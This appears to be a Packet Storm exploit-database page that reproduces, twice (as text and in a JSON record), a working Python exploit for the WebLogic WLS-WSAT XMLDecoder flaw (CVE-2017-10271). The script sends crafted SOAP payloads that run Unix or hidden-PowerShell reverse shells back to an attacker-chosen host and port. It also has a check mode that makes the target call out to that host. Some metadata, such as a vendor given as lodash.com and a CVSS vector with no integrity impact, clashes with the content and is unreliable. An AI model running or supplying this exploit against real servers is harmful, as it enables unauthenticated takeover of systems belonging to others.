📄 Oracle WebLogic WLS-WSAT XMLDecoder Remote Code Execution_PACKETSTORM:220741

7.5 / 10

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Description

This script is a Python-based proof of concept exploit targeting a deserialization vulnerability in Oracle WebLogic Server's WLS-WSAT component. The vulnerability allows unauthenticated attackers to execute arbitrary system commands via crafted SOAP...

Visit Original Source

Basic Information

ID PACKETSTORM:220741

Published May 11, 2026 at 00:00

Affected Product

Affected Versions ==================================================================================================================================
| # Title : Oracle WebLogic WLS-WSAT XMLDecoder Remote Code Execution Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://lodash.com/ |
==================================================================================================================================

[+] Summary : This script is a Python-based proof-of-concept exploit targeting a deserialization vulnerability in Oracle WebLogic Server’s WLS-WSAT component (CVE-2017-10271).
The vulnerability allows unauthenticated attackers to execute arbitrary system commands via crafted SOAP requests sent to the /wls-wsat/CoordinatorPortType endpoint.
The exploit supports both Unix and Windows targets by dynamically generating appropriate command payloads.
It provides two operational modes: a verification mode that triggers an outbound HTTP request to confirm vulnerability,
and an execution mode that attempts to establish a reverse shell connection to the attacker-controlled host.
The tool constructs malicious XML payloads leveraging Java’s XMLDecoder and ProcessBuilder classes, enabling remote command execution if the target is vulnerable and accessible.
It is intended strictly for security testing and research purposes in controlled environments.

[+] POC :

#!/usr/bin/env python
# -*- coding: utf-8 -*-

from sys import exit
from requests import post
from argparse import ArgumentParser
from random import choice
from string import ascii_uppercase, ascii_lowercase, digits
from xml.sax.saxutils import escape

class Exploit:

def __init__(self, check, rhost, lhost, lport, windows):
self.url = rhost if not rhost.endswith('/') else rhost.strip('/')
self.lhost = lhost
self.lport = lport
self.check = check

if windows:
self.target = 'win'
else:
self.target = 'unix'

if self.target == 'unix':
self.cmd_payload = (
"python -c 'import socket,subprocess,os;"
"s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
"s.connect((\"{lhost}\",{lport}));"
"os.dup2(s.fileno(),0);"
"os.dup2(s.fileno(),1);"
"os.dup2(s.fileno(),2);"
"subprocess.call([\"/bin/sh\",\"-i\"]);'"
).format(lhost=self.lhost, lport=self.lport)
else:
self.cmd_payload = (
r"powershell -w hidden -nop -c function RSC{if ($c.Connected -eq $true) "
r"{$c.Close()};if ($p.ExitCode -ne $null) {$p.Close()};exit;};$a='" + self.lhost + r"';"
r"$p='" + self.lport + r"';$c=New-Object system.net.sockets.tcpclient;"
r"$c.connect($a,$p);$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize;"
r"$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';"
r"$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;"
r"$p.StartInfo.UseShellExecute=0;$p.Start();$is=$p.StandardInput;"
r"$os=$p.StandardOutput;Start-Sleep 1;$e=new-object System.Text.AsciiEncoding;"
r"while($os.Peek() -ne -1){$o += $e.GetString($os.Read())};"
r"$s.Write($e.GetBytes($o),0,$o.Length);$o=$null;$d=$false;$t=0;"
r"while (-not $d) {if ($c.Connected -ne $true) {RSC};$pos=0;$i=1;"
r"while (($i -gt 0) -and ($pos -lt $nb.Length)) {$r=$s.Read($nb,$pos,$nb.Length - $pos);"
r"$pos+=$r;if (-not $pos -or $pos -eq 0) {RSC};"
r"if ($nb[0..$($pos-1)] -contains 10) {break}};"
r"if ($pos -gt 0){$str=$e.GetString($nb,0,$pos);$is.write($str);"
r"start-sleep 1;if ($p.ExitCode -ne $null){RSC}else{$o=$e.GetString($os.Read());"
r"while($os.Peek() -ne -1){$o += $e.GetString($os.Read());if ($o -eq $str) {$o=''}};"
r"$s.Write($e.GetBytes($o),0,$o.length);$o=$null;$str=$null}}else{RSC}};"
)

self.cmd_payload = escape(self.cmd_payload)

def cmd_base(self):
return 'cmd' if self.target == 'win' else '/bin/sh'

def cmd_opt(self):
return '/c' if self.target == 'win' else '-c'

def get_generic_check_payload(self):
random_uri = ''.join(
choice(ascii_uppercase + ascii_lowercase + digits)
for _ in range(16))

return '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8" class="java.beans.XMLDecoder">
<object id="url" class="java.net.URL">
<string>http://{lhost}:{lport}/{random_uri}</string>
</object>
<object idref="url">
<void id="stream" method="openStream" />
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>'''.format(
lhost=self.lhost,
lport=self.lport,
random_uri=random_uri
)

def get_process_builder_payload(self):
return '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>{cmd_base}</string>
</void>
<void index="1">
<string>{cmd_opt}</string>
</void>
<void index="2">
<string>{cmd_payload}</string>
</void>
</array>
<void method="start"/>
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>'''.format(
cmd_base=self.cmd_base(),
cmd_opt=self.cmd_opt(),
cmd_payload=self.cmd_payload
)

def print_banner(self):
print("=" * 80)
print("CVE-2017-10271 RCE Exploit")
print("written by: indoushka")
print("Remote Target: {}".format(self.url))
print("Shell Listener: {}:{}".format(self.lhost, self.lport))
print("=" * 80)

def post_exploit(self, data):
headers = {
"Content-Type": "text/xml;charset=UTF-8",
"User-Agent": "Mozilla/5.0"
}

vulnurl = self.url + "/wls-wsat/CoordinatorPortType"

try:
req = post(vulnurl, data=data, headers=headers, timeout=10, verify=False)

if self.check:
print("[*] Did you get an HTTP GET request back?")
else:
print("[*] Did you get a shell back?")

except Exception as e:
print('[!] Connection Error')
print(e)

def run(self):
self.print_banner()

if self.check:
print('[+] Generating generic check payload')
payload = self.get_generic_check_payload()
else:
print('[+] Generating execution payload')
payload = self.get_process_builder_payload()

print('[*] Generated:')
print(payload)

if self.check:
print('[+] Running generic check payload')
else:

print('[+] Running {} execute payload'.format(self.target))

self.post_exploit(data=payload)

if __name__ == "__main__":
parser = ArgumentParser(description='CVE-2017-10271 WebLogic exploit')

parser.add_argument('-l', '--lhost', required=True, dest='lhost')
parser.add_argument('-p', '--lport', required=True, dest='lport')
parser.add_argument('-r', '--rhost', required=True, dest='rhost')
parser.add_argument('-c', '--check', dest='check', action='store_true')
parser.add_argument('-w', '--win', dest='windows', action='store_true')

args = parser.parse_args()

exploit = Exploit(
check=args.check,
rhost=args.rhost,
lhost=args.lhost,
lport=args.lport,
windows=args.windows
)

exploit.run()

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================

{
    "lastseen": "2026-05-11T17:17:28",
    "description": "This script is a Python-based proof of concept exploit targeting a deserialization vulnerability in Oracle WebLogic Server's WLS-WSAT component. The vulnerability allows unauthenticated attackers to execute arbitrary system commands via crafted SOAP...",
    "published": "2026-05-11T00:00:00",
    "modified": "2026-05-11T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Oracle WebLogic WLS-WSAT XMLDecoder Remote Code Execution",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:220741",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2017-10271"
    ],
    "sourceData": "==================================================================================================================================\n    | # Title     : Oracle WebLogic WLS-WSAT XMLDecoder Remote Code Execution Exploit                                                |\n    | # Author    : indoushka                                                                                                        |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |\n    | # Vendor    : https://lodash.com/                                                                                              |\n    ==================================================================================================================================\n    \n    [+] Summary    : This script is a Python-based proof-of-concept exploit targeting a deserialization vulnerability in Oracle WebLogic Server\u2019s WLS-WSAT component (CVE-2017-10271). \n                     The vulnerability allows unauthenticated attackers to execute arbitrary system commands via crafted SOAP requests sent to the /wls-wsat/CoordinatorPortType endpoint.\n                     The exploit supports both Unix and Windows targets by dynamically generating appropriate command payloads. \n    \t\t\t\t It provides two operational modes: a verification mode that triggers an outbound HTTP request to confirm vulnerability, \n    \t\t\t\t and an execution mode that attempts to establish a reverse shell connection to the attacker-controlled host.\n                     The tool constructs malicious XML payloads leveraging Java\u2019s XMLDecoder and ProcessBuilder classes, enabling remote command execution if the target is vulnerable and accessible. \n    \t\t\t\t It is intended strictly for security testing and research purposes in controlled environments.\n    \n    [+] POC   :  \n    \n    \n    #!/usr/bin/env python\n    # -*- coding: utf-8 -*-\n    \n    from sys import exit\n    from requests import post\n    from argparse import ArgumentParser\n    from random import choice\n    from string import ascii_uppercase, ascii_lowercase, digits\n    from xml.sax.saxutils import escape\n    \n    \n    class Exploit:\n    \n        def __init__(self, check, rhost, lhost, lport, windows):\n            self.url = rhost if not rhost.endswith('/') else rhost.strip('/')\n            self.lhost = lhost\n            self.lport = lport\n            self.check = check\n    \n            if windows:\n                self.target = 'win'\n            else:\n                self.target = 'unix'\n    \n            if self.target == 'unix':\n                self.cmd_payload = (\n                    \"python -c 'import socket,subprocess,os;\"\n                    \"s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);\"\n                    \"s.connect((\\\"{lhost}\\\",{lport}));\"\n                    \"os.dup2(s.fileno(),0);\"\n                    \"os.dup2(s.fileno(),1);\"\n                    \"os.dup2(s.fileno(),2);\"\n                    \"subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"]);'\"\n                ).format(lhost=self.lhost, lport=self.lport)\n            else:\n                self.cmd_payload = (\n                    r\"powershell -w hidden -nop -c function RSC{if ($c.Connected -eq $true) \"\n                    r\"{$c.Close()};if ($p.ExitCode -ne $null) {$p.Close()};exit;};$a='\" + self.lhost + r\"';\"\n                    r\"$p='\" + self.lport + r\"';$c=New-Object system.net.sockets.tcpclient;\"\n                    r\"$c.connect($a,$p);$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize;\"\n                    r\"$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';\"\n                    r\"$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;\"\n                    r\"$p.StartInfo.UseShellExecute=0;$p.Start();$is=$p.StandardInput;\"\n                    r\"$os=$p.StandardOutput;Start-Sleep 1;$e=new-object System.Text.AsciiEncoding;\"\n                    r\"while($os.Peek() -ne -1){$o += $e.GetString($os.Read())};\"\n                    r\"$s.Write($e.GetBytes($o),0,$o.Length);$o=$null;$d=$false;$t=0;\"\n                    r\"while (-not $d) {if ($c.Connected -ne $true) {RSC};$pos=0;$i=1;\"\n                    r\"while (($i -gt 0) -and ($pos -lt $nb.Length)) {$r=$s.Read($nb,$pos,$nb.Length - $pos);\"\n                    r\"$pos+=$r;if (-not $pos -or $pos -eq 0) {RSC};\"\n                    r\"if ($nb[0..$($pos-1)] -contains 10) {break}};\"\n                    r\"if ($pos -gt 0){$str=$e.GetString($nb,0,$pos);$is.write($str);\"\n                    r\"start-sleep 1;if ($p.ExitCode -ne $null){RSC}else{$o=$e.GetString($os.Read());\"\n                    r\"while($os.Peek() -ne -1){$o += $e.GetString($os.Read());if ($o -eq $str) {$o=''}};\"\n                    r\"$s.Write($e.GetBytes($o),0,$o.length);$o=$null;$str=$null}}else{RSC}};\"\n                )\n    \n            self.cmd_payload = escape(self.cmd_payload)\n    \n        def cmd_base(self):\n            return 'cmd' if self.target == 'win' else '/bin/sh'\n    \n        def cmd_opt(self):\n            return '/c' if self.target == 'win' else '-c'\n    \n        def get_generic_check_payload(self):\n            random_uri = ''.join(\n                choice(ascii_uppercase + ascii_lowercase + digits)\n                for _ in range(16))\n    \n            return '''<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n      <soapenv:Header>\n        <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n          <java version=\"1.8\" class=\"java.beans.XMLDecoder\">\n            <object id=\"url\" class=\"java.net.URL\">\n              <string>http://{lhost}:{lport}/{random_uri}</string>\n            </object>\n            <object idref=\"url\">\n              <void id=\"stream\" method=\"openStream\" />\n            </object>\n          </java>\n        </work:WorkContext>\n      </soapenv:Header>\n      <soapenv:Body/>\n    </soapenv:Envelope>'''.format(\n                lhost=self.lhost,\n                lport=self.lport,\n                random_uri=random_uri\n            )\n    \n        def get_process_builder_payload(self):\n            return '''<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n      <soapenv:Header>\n        <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n          <java>\n            <object class=\"java.lang.ProcessBuilder\">\n              <array class=\"java.lang.String\" length=\"3\">\n                <void index=\"0\">\n                  <string>{cmd_base}</string>\n                </void>\n                <void index=\"1\">\n                  <string>{cmd_opt}</string>\n                </void>\n                <void index=\"2\">\n                  <string>{cmd_payload}</string>\n                </void>\n              </array>\n              <void method=\"start\"/>\n            </object>\n          </java>\n        </work:WorkContext>\n      </soapenv:Header>\n      <soapenv:Body/>\n    </soapenv:Envelope>'''.format(\n                cmd_base=self.cmd_base(),\n                cmd_opt=self.cmd_opt(),\n                cmd_payload=self.cmd_payload\n            )\n    \n        def print_banner(self):\n            print(\"=\" * 80)\n            print(\"CVE-2017-10271 RCE Exploit\")\n            print(\"written by: indoushka\")\n            print(\"Remote Target: {}\".format(self.url))\n            print(\"Shell Listener: {}:{}\".format(self.lhost, self.lport))\n            print(\"=\" * 80)\n    \n        def post_exploit(self, data):\n            headers = {\n                \"Content-Type\": \"text/xml;charset=UTF-8\",\n                \"User-Agent\": \"Mozilla/5.0\"\n            }\n    \n            vulnurl = self.url + \"/wls-wsat/CoordinatorPortType\"\n    \n            try:\n                req = post(vulnurl, data=data, headers=headers, timeout=10, verify=False)\n    \n                if self.check:\n                    print(\"[*] Did you get an HTTP GET request back?\")\n                else:\n                    print(\"[*] Did you get a shell back?\")\n    \n            except Exception as e:\n                print('[!] Connection Error')\n                print(e)\n    \n        def run(self):\n            self.print_banner()\n    \n            if self.check:\n                print('[+] Generating generic check payload')\n                payload = self.get_generic_check_payload()\n            else:\n                print('[+] Generating execution payload')\n                payload = self.get_process_builder_payload()\n    \n            print('[*] Generated:')\n            print(payload)\n    \n            if self.check:\n                print('[+] Running generic check payload')\n            else:\n    \n                print('[+] Running {} execute payload'.format(self.target))\n    \n            self.post_exploit(data=payload)\n    \n    \n    if __name__ == \"__main__\":\n        parser = ArgumentParser(description='CVE-2017-10271 WebLogic exploit')\n    \n        parser.add_argument('-l', '--lhost', required=True, dest='lhost')\n        parser.add_argument('-p', '--lport', required=True, dest='lport')\n        parser.add_argument('-r', '--rhost', required=True, dest='rhost')\n        parser.add_argument('-c', '--check', dest='check', action='store_true')\n        parser.add_argument('-w', '--win', dest='windows', action='store_true')\n    \n        args = parser.parse_args()\n    \n        exploit = Exploit(\n            check=args.check,\n            rhost=args.rhost,\n            lhost=args.lhost,\n            lport=args.lport,\n            windows=args.windows\n        )\n    \n        exploit.run()\n    \n    Greetings to :==============================================================================\n    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\n    ============================================================================================",
    "sourceHref": "https://packetstorm.news/download/220741",
    "cvss": {
        "score": 7.5,
        "severity": "HIGH",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/220741/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply